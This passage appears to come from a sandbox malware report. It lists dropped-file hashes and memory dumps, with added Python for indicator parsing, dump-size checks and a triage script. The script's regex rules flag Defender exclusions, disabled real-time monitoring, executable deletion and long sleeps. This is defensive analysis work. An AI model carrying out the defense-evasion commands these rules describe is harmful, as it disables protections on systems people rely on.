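    (re.compile(r"(?i)\b(?:set|add)-mppreference\b.*-exclusion(?:path|extension|process|ipaddress)"),
     "defender_exclusion"),
    (re.compile(r"(?i)\bset-mppreference\b.*-disable(?:realtimemonitoring|ioavprotection|behaviormonitoring)"),
     "defender_disabled"),
    (re.compile(r"(?i)\bdel\b[^&|]*\.exe"), "deletes_executable"),
]
DELAY_RE = re.compile(r"(?i)(?:\bstart-sleep\b(?:\s+-s(?:econds)?)?|\btimeout(?:\.exe)?\b(?:\s+/t)?)\s+(\d+)")
MIN_SUSPICIOUS_DELAY = 10  # seconds; sleeps this long mostly exist to outlast sandbox timeouts


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; decoding it as UTF-8
    would give a string full of NULs."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def effective_script(cmdline: str) -> tuple:
    """Return (script text, was_encoded) for a powershell.exe or cmd.exe command line."""
    m = ENC_RE.search(cmdline)
    if m:
        return decode_encoded_command(m.group(1)), True
    return LAUNCHER_RE.sub("", cmdline, count=1).strip(), False


def triage(cmdline: str) -> dict:
    """Decode first, then apply the rules to what the interpreter will actually run."""
    script, encoded = effective_script(cmdline)
    findings = [name for rx, name in RULES if rx.search(script)]
    m = DELAY_RE.search(script)
    delay = int(m.group(1)) if m else 0
    if delay >= MIN_SUSPICIOUS_DELAY:
        findings.append("long_delay")
    if encoded:
        findings.append("encoded_command")
    return {"script": script, "encoded": encoded, "delay_seconds": delay, "findings": findings}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = triage(line)
        print(f"{'ENC ' if r['encoded'] else '    '}{r['script']!r} -> {r['findings']}")
```

The point of decoding before matching is that the encoded Set-MpPreference call in the D89F.tmp.exe chain contains none of the plain-text tokens a naive command-line rule would look for; only the decoded script does. The deletes_executable rule fires on the cmd.exe line even though its 3-second timeout is below the delay threshold, so the two signals are reported independently.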
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\D449.tmp.exe.logFilesize
1KB
MD5cbe207895aa962105ca913568f7d2135
SHA1c62bcc9aac6f6ad0b14457d3d51c0a474528b106
SHA256bd468d112dd92eab9177b172cb46016d96c6d85fe567734852f8c07733c14a24
SHA5123a93a75b1c3a93d8466a7b2f5b0433805d7055e829834203b3b6ae48ecb899f3aaf68610057a0ce0f9a29647cd7c6577dcb4c89124dc368e91f5866a5dbf1e44
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exeFilesize
2.8MB
MD5688774feec1cc9685acaece804dc7a26
SHA168afac92caeb49c2bb96970138738844aa7b8f99
SHA256a54493e71a7f28fe61e607ba4c089ada71e13ff9e1df6cef5619a4163e2b0a1f
SHA51268467b861e163b4b0ff7477c3c780eb3141ae069e8145431798576a1da74347b0da6fa0a0ad19defc3e0d29bdfb29240bffa12ef2d1904697a6e52f965da041a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exeFilesize
2.8MB
MD5688774feec1cc9685acaece804dc7a26
SHA168afac92caeb49c2bb96970138738844aa7b8f99
SHA256a54493e71a7f28fe61e607ba4c089ada71e13ff9e1df6cef5619a4163e2b0a1f
SHA51268467b861e163b4b0ff7477c3c780eb3141ae069e8145431798576a1da74347b0da6fa0a0ad19defc3e0d29bdfb29240bffa12ef2d1904697a6e52f965da041a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exe.gl87l0a.partialFilesize
2.8MB
MD5688774feec1cc9685acaece804dc7a26
SHA168afac92caeb49c2bb96970138738844aa7b8f99
SHA256a54493e71a7f28fe61e607ba4c089ada71e13ff9e1df6cef5619a4163e2b0a1f
SHA51268467b861e163b4b0ff7477c3c780eb3141ae069e8145431798576a1da74347b0da6fa0a0ad19defc3e0d29bdfb29240bffa12ef2d1904697a6e52f965da041a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G1ORIWBN\ghjk[1].exeFilesize
2.8MB
MD5688774feec1cc9685acaece804dc7a26
SHA168afac92caeb49c2bb96970138738844aa7b8f99
SHA256a54493e71a7f28fe61e607ba4c089ada71e13ff9e1df6cef5619a4163e2b0a1f
SHA51268467b861e163b4b0ff7477c3c780eb3141ae069e8145431798576a1da74347b0da6fa0a0ad19defc3e0d29bdfb29240bffa12ef2d1904697a6e52f965da041a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G1ORIWBN\suggestions[1].en-USFilesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD55f724287bd2b1b7d65c758e667b7451a
SHA15bc2bc01a8917287da2d9a1eb00017e4705dac3e
SHA256cf2057cc81ef2c4b274e4815b41b09a538ddf4b2c32527125d72992e9280f210
SHA512d4542d08a3fe6703aef3874007625d58bc2b8aeb28a0fa60974f4b00ebe8a113b0df624e3d254ec9cc0ab0bd59bebec993632d4ab5599548d7e76fd0e5a0fcf9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD569ff83458b430d072900c334f1f63e00
SHA19b15dfb5e55658fdb92fc8763e765d67501bdcce
SHA25698f9f592cba20055e597f1f9dcc01c6aa0508d69f2ad1e0bca3b25eda2f232b9
SHA512b93ab4086ebf9a94a2da3de74cb151734b5081d1fff032af0c12a2c986d094a93a2365b816d314c2db41f6b64d465af7ca02e83b9618a4dc0a077c4f881429e7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD55f724287bd2b1b7d65c758e667b7451a
SHA15bc2bc01a8917287da2d9a1eb00017e4705dac3e
SHA256cf2057cc81ef2c4b274e4815b41b09a538ddf4b2c32527125d72992e9280f210
SHA512d4542d08a3fe6703aef3874007625d58bc2b8aeb28a0fa60974f4b00ebe8a113b0df624e3d254ec9cc0ab0bd59bebec993632d4ab5599548d7e76fd0e5a0fcf9
-
C:\Users\Admin\AppData\Local\Temp\B2503312\mozglue.dllFilesize
135KB
MD59e682f1eb98a9d41468fc3e50f907635
SHA185e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SHA512230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed
-
C:\Users\Admin\AppData\Local\Temp\B2503312\msvcp140.dllFilesize
429KB
MD5109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
C:\Users\Admin\AppData\Local\Temp\B2503312\nss3.dllFilesize
1.2MB
MD5556ea09421a0f74d31c4c0a89a70dc23
SHA1f739ba9b548ee64b13eb434a3130406d23f836e3
SHA256f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
SHA5122481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2
-
C:\Users\Admin\AppData\Local\Temp\B2503312\vcruntime140.dllFilesize
81KB
MD57587bf9cb4147022cd5681b015183046
SHA1f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA5120b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f
-
C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exeFilesize
2.8MB
MD5938817d3e634cfb8a9d3ac2840f76863
SHA1271f98e2096ca0f269b619a50063dd0683e73654
SHA256e7ab444923133b71a9c88f388e6a53a592c8e065a8fd79ce2b4568da0a471cc7
SHA512cfba6ed98b6091709c0ec15924afad8e82c38a26f274e14e3b5eb5f83a53c432b83dc2e8a5db141487cc372f4b6468dde5a7fd00de9cdc90c7fb8c4d7207580d
-
C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exeFilesize
2.8MB
MD5938817d3e634cfb8a9d3ac2840f76863
SHA1271f98e2096ca0f269b619a50063dd0683e73654
SHA256e7ab444923133b71a9c88f388e6a53a592c8e065a8fd79ce2b4568da0a471cc7
SHA512cfba6ed98b6091709c0ec15924afad8e82c38a26f274e14e3b5eb5f83a53c432b83dc2e8a5db141487cc372f4b6468dde5a7fd00de9cdc90c7fb8c4d7207580d
-
C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exeFilesize
2.8MB
MD5938817d3e634cfb8a9d3ac2840f76863
SHA1271f98e2096ca0f269b619a50063dd0683e73654
SHA256e7ab444923133b71a9c88f388e6a53a592c8e065a8fd79ce2b4568da0a471cc7
SHA512cfba6ed98b6091709c0ec15924afad8e82c38a26f274e14e3b5eb5f83a53c432b83dc2e8a5db141487cc372f4b6468dde5a7fd00de9cdc90c7fb8c4d7207580d
-
C:\Users\Admin\AppData\Local\Temp\D449.tmp.exe
Filesize: 3.6MB
MD5: 20d27d8d88014215720e53218998dc59
SHA1: 392a43d9a4ac4feb0731552d3bb4cbc5801bb862
SHA256: a81da88f6e47eeb58b864d01b09ed273421ab6e1b9b3c5f763f47a913b5b2ff3
SHA512: 579ccc664bdee663bc1ca05a3b7fb4fd7ff65d58b669159450a5787cff7c09e3a8bf70b9f2ce1fa594b7e920b474473168c7e7a13293b8f7d7625aec0f3af439
-
C:\Users\Admin\AppData\Local\Temp\D89F.tmp.exe
Filesize: 3.1MB
MD5: 520a5d096ab0c9095aac940617c5acf6
SHA1: d76821fb07ee23971a105f9427d5e7d005c8c720
SHA256: 0fd2e8f4ce5b3c6f3ecf206683da7e3474781c3f6edf4c384f9af4805e65e6dd
SHA512: 2b580385b02d2adc0058ec25ef1c3520493f3812111e36515e0069ea26e40182e619539db909f4baa8ec40cc7cd5e904536c52d575f5ba77d578ea6cf7f2b596
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_clytndnv.pvz.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\D449.tmp.exe
Filesize: 3.6MB
MD5: 20d27d8d88014215720e53218998dc59
SHA1: 392a43d9a4ac4feb0731552d3bb4cbc5801bb862
SHA256: a81da88f6e47eeb58b864d01b09ed273421ab6e1b9b3c5f763f47a913b5b2ff3
SHA512: 579ccc664bdee663bc1ca05a3b7fb4fd7ff65d58b669159450a5787cff7c09e3a8bf70b9f2ce1fa594b7e920b474473168c7e7a13293b8f7d7625aec0f3af439
-
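The dropped-file list above repeats identical records and lists the same D449.tmp.exe hash under both Temp and Roaming. The Python below is an added example, not part of the sandbox report: it parses the flattened form of that list (label fused to value, records separated by "-") into one IOC per SHA-256 with every path it appeared at, and accepts a hash only at its exact length so that a value truncated by extraction is reported rather than silently kept. The sample text embedded in it is copied from the entries above, trimmed to four records.

```python
import re
from collections import OrderedDict

# Constructed sample: four dropped-file records copied from the report above in the
# page's flattened form. The page lists CE7B.tmp.exe three times; two copies suffice.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exeFilesize
2.8MB
MD5938817d3e634cfb8a9d3ac2840f76863
SHA1271f98e2096ca0f269b619a50063dd0683e73654
SHA256e7ab444923133b71a9c88f388e6a53a592c8e065a8fd79ce2b4568da0a471cc7
SHA512cfba6ed98b6091709c0ec15924afad8e82c38a26f274e14e3b5eb5f83a53c432b83dc2e8a5db141487cc372f4b6468dde5a7fd00de9cdc90c7fb8c4d7207580d
-
C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exeFilesize
2.8MB
MD5938817d3e634cfb8a9d3ac2840f76863
SHA1271f98e2096ca0f269b619a50063dd0683e73654
SHA256e7ab444923133b71a9c88f388e6a53a592c8e065a8fd79ce2b4568da0a471cc7
SHA512cfba6ed98b6091709c0ec15924afad8e82c38a26f274e14e3b5eb5f83a53c432b83dc2e8a5db141487cc372f4b6468dde5a7fd00de9cdc90c7fb8c4d7207580d
-
C:\Users\Admin\AppData\Local\Temp\D449.tmp.exeFilesize
3.6MB
MD520d27d8d88014215720e53218998dc59
SHA1392a43d9a4ac4feb0731552d3bb4cbc5801bb862
SHA256a81da88f6e47eeb58b864d01b09ed273421ab6e1b9b3c5f763f47a913b5b2ff3
SHA512579ccc664bdee663bc1ca05a3b7fb4fd7ff65d58b669159450a5787cff7c09e3a8bf70b9f2ce1fa594b7e920b474473168c7e7a13293b8f7d7625aec0f3af439
-
C:\Users\Admin\AppData\Roaming\D449.tmp.exeFilesize
3.6MB
MD520d27d8d88014215720e53218998dc59
SHA1392a43d9a4ac4feb0731552d3bb4cbc5801bb862
SHA256a81da88f6e47eeb58b864d01b09ed273421ab6e1b9b3c5f763f47a913b5b2ff3
SHA512579ccc664bdee663bc1ca05a3b7fb4fd7ff65d58b669159450a5787cff7c09e3a8bf70b9f2ce1fa594b7e920b474473168c7e7a13293b8f7d7625aec0f3af439
-
""".strip()

# Exact digest lengths: a hash that lost characters in extraction will not match.
HASH_RE = {
    "md5": re.compile(r"^MD5:?\s*([0-9a-fA-F]{32})$"),
    "sha1": re.compile(r"^SHA1:?\s*([0-9a-fA-F]{40})$"),
    "sha256": re.compile(r"^SHA256:?\s*([0-9a-fA-F]{64})$"),
    "sha512": re.compile(r"^SHA512:?\s*([0-9a-fA-F]{128})$"),
}
# Path line, with or without the "Filesize" label fused onto its end.
PATH_RE = re.compile(r"^([A-Za-z]:\\.*?)\s*(?:Filesize:?)?$")
SIZE_RE = re.compile(r"^(?:Filesize:?\s*)?(\d+(?:\.\d+)?(?:B|KB|MB|GB))$")


def parse_dropped_files(text):
    """Return (records, unparsed): one dict per record, plus lines that fit no pattern."""
    records, unparsed, cur = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":  # record separator
            if cur:
                records.append(cur)
            cur = None
            continue
        m = PATH_RE.match(line)
        if m:
            if cur:  # separator missing: close the open record anyway
                records.append(cur)
            cur = {"path": m.group(1), "size": None, "md5": None,
                   "sha1": None, "sha256": None, "sha512": None}
            continue
        if cur is None:
            unparsed.append(line)
            continue
        m = SIZE_RE.match(line)
        if m:
            cur["size"] = m.group(1)
            continue
        for key, rx in HASH_RE.items():
            m = rx.match(line)
            if m:
                cur[key] = m.group(1).lower()
                break
        else:
            unparsed.append(line)
    if cur:
        records.append(cur)
    return records, unparsed


def group_by_sha256(records):
    """Collapse repeated records into one IOC per SHA-256, keeping every path seen.
    A record whose other digests or size disagree with the group is noted as a conflict."""
    groups = OrderedDict()
    for r in records:
        g = groups.setdefault(r["sha256"], {"md5": r["md5"], "sha1": r["sha1"],
                                            "sha512": r["sha512"], "size": r["size"],
                                            "paths": [], "records": 0})
        g["records"] += 1
        if r["path"] not in g["paths"]:
            g["paths"].append(r["path"])
        for k in ("md5", "sha1", "sha512", "size"):
            if g[k] != r[k]:
                g.setdefault("conflicts", []).append((k, r["path"]))
    return groups


if __name__ == "__main__":
    recs, bad = parse_dropped_files(SAMPLE)
    for sha, g in group_by_sha256(recs).items():
        print(f"{sha}  {g['size']:>6}  x{g['records']}  {'; '.join(g['paths'])}")
    for line in bad:
        print("UNPARSED:", line)
```

Run on the four sample records this yields two IOCs: the CE7B hash at one path (two identical records collapsed) and the D449 hash at both its Temp and Roaming paths. Feeding the full list above through it gives the de-duplicated hash set to push to blocklists.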
memory/220-2592-0x0000020375CA0000-0x0000020375CB0000-memory.dmp
Filesize: 64KB
-
memory/1376-216-0x00000000006E0000-0x00000000009B2000-memory.dmp
Filesize: 2.8MB
-
memory/1880-401-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-239-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-316-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-314-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-274-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-318-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-256-0x000001AF3F940000-0x000001AF3F950000-memory.dmp
Filesize: 64KB
-
memory/1880-242-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-1735-0x000001AF3F940000-0x000001AF3F950000-memory.dmp
Filesize: 64KB
-
memory/1880-407-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-405-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-403-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-240-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-399-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-397-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-395-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-393-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-391-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-234-0x0000000000400000-0x00000000004A6000-memory.dmp
Filesize: 664KB
-
memory/1880-388-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-386-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-383-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-381-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-331-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-329-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-327-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-325-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-320-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/1880-322-0x000001AF3F860000-0x000001AF3F938000-memory.dmp
Filesize: 864KB
-
memory/2108-1739-0x0000000002460000-0x0000000002470000-memory.dmp
Filesize: 64KB
-
memory/2108-297-0x0000000002460000-0x0000000002470000-memory.dmp
Filesize: 64KB
-
memory/2108-1736-0x0000000002460000-0x0000000002470000-memory.dmp
Filesize: 64KB
-
memory/2108-273-0x0000000002460000-0x0000000002470000-memory.dmp
Filesize: 64KB
-
memory/2316-172-0x0000000002E00000-0x0000000002E10000-memory.dmp
Filesize: 64KB
-
memory/2316-162-0x0000000002E00000-0x0000000002E10000-memory.dmp
Filesize: 64KB
-
memory/2316-150-0x0000000005B80000-0x0000000005BE6000-memory.dmp
Filesize: 408KB
-
memory/2316-161-0x0000000006340000-0x000000000635E000-memory.dmp
Filesize: 120KB
-
memory/2316-173-0x0000000002E00000-0x0000000002E10000-memory.dmp
Filesize: 64KB
-
memory/2316-174-0x0000000002E00000-0x0000000002E10000-memory.dmp
Filesize: 64KB
-
memory/2316-149-0x0000000002E00000-0x0000000002E10000-memory.dmp
Filesize: 64KB
-
memory/2316-148-0x0000000005550000-0x0000000005B78000-memory.dmp
Filesize: 6.2MB
-
memory/2316-164-0x0000000006830000-0x000000000684A000-memory.dmp
Filesize: 104KB
-
memory/2316-163-0x0000000007990000-0x000000000800A000-memory.dmp
Filesize: 6.5MB
-
memory/2316-151-0x0000000005CE0000-0x0000000005D46000-memory.dmp
Filesize: 408KB
-
memory/2316-147-0x0000000002E00000-0x0000000002E10000-memory.dmp
Filesize: 64KB
-
memory/2316-146-0x0000000002D60000-0x0000000002D96000-memory.dmp
Filesize: 216KB
-
memory/2336-2540-0x00000239FED30000-0x00000239FED40000-memory.dmp
Filesize: 64KB
-
memory/2336-2963-0x00000239FF320000-0x00000239FF32A000-memory.dmp
Filesize: 40KB
-
memory/2336-2541-0x00000239FED30000-0x00000239FED40000-memory.dmp
Filesize: 64KB
-
memory/2336-2932-0x00000239FEF90000-0x00000239FEFAC000-memory.dmp
Filesize: 112KB
-
memory/2336-2948-0x00000239FF300000-0x00000239FF30A000-memory.dmp
Filesize: 40KB
-
memory/2336-2954-0x00000239FF310000-0x00000239FF318000-memory.dmp
Filesize: 32KB
-
memory/2848-220-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize: 128KB
-
memory/2848-227-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize: 128KB
-
memory/2848-225-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize: 128KB
-
memory/2848-385-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize: 128KB
-
memory/3580-145-0x0000000005CD0000-0x0000000005CF2000-memory.dmp
Filesize: 136KB
-
memory/3580-144-0x00000000059E0000-0x00000000059F0000-memory.dmp
Filesize: 64KB
-
memory/3580-143-0x0000000000CF0000-0x0000000000FBA000-memory.dmp
Filesize: 2.8MB
-
memory/3580-165-0x00000000059E0000-0x00000000059F0000-memory.dmp
Filesize: 64KB
-
memory/3644-231-0x00000000005D0000-0x00000000008EA000-memory.dmp
Filesize: 3.1MB
-
memory/3644-1569-0x0000000005090000-0x00000000050A0000-memory.dmp
Filesize: 64KB
-
memory/3644-233-0x0000000005090000-0x00000000050A0000-memory.dmp
Filesize: 64KB
-
memory/3932-206-0x00007FF4B8110000-0x00007FF4B820A000-memory.dmp
Filesize: 1000KB
-
memory/3932-205-0x0000025F745F0000-0x0000025F745F7000-memory.dmp
Filesize: 28KB
-
memory/3932-212-0x00007FF4B8110000-0x00007FF4B820A000-memory.dmp
Filesize: 1000KB
-
memory/3932-211-0x00007FF4B8110000-0x00007FF4B820A000-memory.dmp
Filesize: 1000KB
-
memory/3932-210-0x00007FF4B8110000-0x00007FF4B820A000-memory.dmp
Filesize: 1000KB
-
memory/3932-209-0x00007FF4B8110000-0x00007FF4B820A000-memory.dmp
Filesize: 1000KB
-
memory/3932-202-0x0000025F744D0000-0x0000025F744D1000-memory.dmp
Filesize: 4KB
-
memory/3932-414-0x00007FF4B8110000-0x00007FF4B820A000-memory.dmp
Filesize: 1000KB
-
memory/3932-204-0x00007FF4B8110000-0x00007FF4B820A000-memory.dmp
Filesize: 1000KB
-
memory/3940-3280-0x0000000006ED0000-0x0000000006F02000-memory.dmp
Filesize: 200KB
-
memory/3940-3318-0x000000007F3D0000-0x000000007F3E0000-memory.dmp
Filesize: 64KB
-
memory/3940-3527-0x0000000007490000-0x00000000074AA000-memory.dmp
Filesize: 104KB
-
memory/3940-3506-0x00000000072E0000-0x00000000072EE000-memory.dmp
Filesize: 56KB
-
memory/3940-3368-0x00000000074E0000-0x0000000007576000-memory.dmp
Filesize: 600KB
-
memory/3940-3320-0x00000000072D0000-0x00000000072DA000-memory.dmp
Filesize: 40KB
-
memory/3940-3319-0x0000000004A90000-0x0000000004AA0000-memory.dmp
Filesize: 64KB
-
memory/3940-3240-0x0000000004A90000-0x0000000004AA0000-memory.dmp
Filesize: 64KB
-
memory/3940-3302-0x00000000064F0000-0x000000000650E000-memory.dmp
Filesize: 120KB
-
memory/3940-3285-0x0000000074BE0000-0x0000000074C2C000-memory.dmp
Filesize: 304KB
-
memory/3940-3241-0x0000000004A90000-0x0000000004AA0000-memory.dmp
Filesize: 64KB
-
memory/3968-232-0x000001AB8B740000-0x000001AB8B762000-memory.dmp
Filesize: 136KB
-
memory/3968-224-0x000001AB89610000-0x000001AB899A8000-memory.dmp
Filesize: 3.6MB
-
memory/3968-228-0x000001AB89CF0000-0x000001AB89D00000-memory.dmp
Filesize: 64KB
-
memory/4440-181-0x0000000000400000-0x0000000000432000-memory.dmp
Filesize: 200KB
-
memory/4440-208-0x00000000010F0000-0x000000000110C000-memory.dmp
Filesize: 112KB
-
memory/4440-178-0x0000000000400000-0x0000000000432000-memory.dmp
Filesize: 200KB
-
memory/4440-182-0x0000000000400000-0x0000000000432000-memory.dmp
Filesize: 200KB
-
memory/4440-183-0x0000000000400000-0x0000000000432000-memory.dmp
Filesize: 200KB
-
memory/4440-198-0x00000000010F0000-0x000000000110C000-memory.dmp
Filesize: 112KB
-
memory/4440-201-0x00000000010F0000-0x000000000110C000-memory.dmp
Filesize: 112KB
-
memory/4440-207-0x0000000000400000-0x0000000000432000-memory.dmp
Filesize: 200KB
-
memory/4440-196-0x00000000010F0000-0x000000000110C000-memory.dmp
Filesize: 112KB
-
memory/4440-200-0x0000000002E40000-0x0000000003E40000-memory.dmp
Filesize: 16.0MB
-
memory/4440-203-0x0000000002D20000-0x0000000002D22000-memory.dmp
Filesize: 8KB
-
memory/4440-197-0x0000000002BF0000-0x0000000002C0A000-memory.dmp
Filesize: 104KB
-
memory/4440-184-0x0000000000400000-0x0000000000432000-memory.dmp
Filesize: 200KB
-
memory/4472-3317-0x0000000000400000-0x0000000000480000-memory.dmp
Filesize: 512KB
-
memory/4672-2553-0x00000256F3050000-0x00000256F3060000-memory.dmp
Filesize: 64KB
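Each memory-dump name above encodes the process ID, a dump index and the start and end address of the dumped region, so the region length can be recomputed and compared with the reported Filesize. The Python below is an added example, not part of the report: it parses the names, checks that every reported size is a plausible rounding of its address-range length (to the precision the report prints), and summarises how many dumps cover each distinct region of a process. The sample entries are copied from the list above, except the final pid-9999 entry, which is constructed with a wrong size so the check has something to flag.

```python
import re
from collections import defaultdict

# Constructed sample: memory-dump entries copied from the report above in the page's
# flattened form (name fused to "Filesize", size on the next line). The last entry
# (pid 9999) is NOT from the report: its reported size does not fit its range.
SAMPLE = """
memory/4440-181-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/4440-178-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/4440-196-0x00000000010F0000-0x000000000110C000-memory.dmpFilesize
112KB
-
memory/4440-200-0x0000000002E40000-0x0000000003E40000-memory.dmpFilesize
16.0MB
-
memory/3932-206-0x00007FF4B8110000-0x00007FF4B820A000-memory.dmpFilesize
1000KB
-
memory/2316-148-0x0000000005550000-0x0000000005B78000-memory.dmpFilesize
6.2MB
-
memory/1880-234-0x0000000000400000-0x00000000004A6000-memory.dmpFilesize
664KB
-
memory/9999-1-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
64KB
""".strip()

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)"
    r"-memory\.dmp\s*(?:Filesize:?)?\s*$")
SIZE_RE = re.compile(r"^(?:Filesize:?\s*)?(?P<num>\d+(?:\.\d+)?)\s*(?P<unit>B|KB|MB|GB)$")
UNIT = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}


def parse_reported_size(text):
    """'864KB' -> (884736.0, 512.0): bytes, plus half a unit in the last printed digit,
    which is the most a correctly rounded value can differ from the true length."""
    m = SIZE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    num, mult = m["num"], UNIT[m["unit"]]
    decimals = len(num.partition(".")[2])
    return float(num) * mult, 0.5 * mult / 10 ** decimals


def parse_dumps(text):
    """Parse name/size pairs; size_ok is False when the reported size cannot be a
    rounding of the address-range length (or the range is empty/inverted)."""
    lines = [l.strip() for l in text.splitlines() if l.strip() and l.strip() != "-"]
    if len(lines) % 2:
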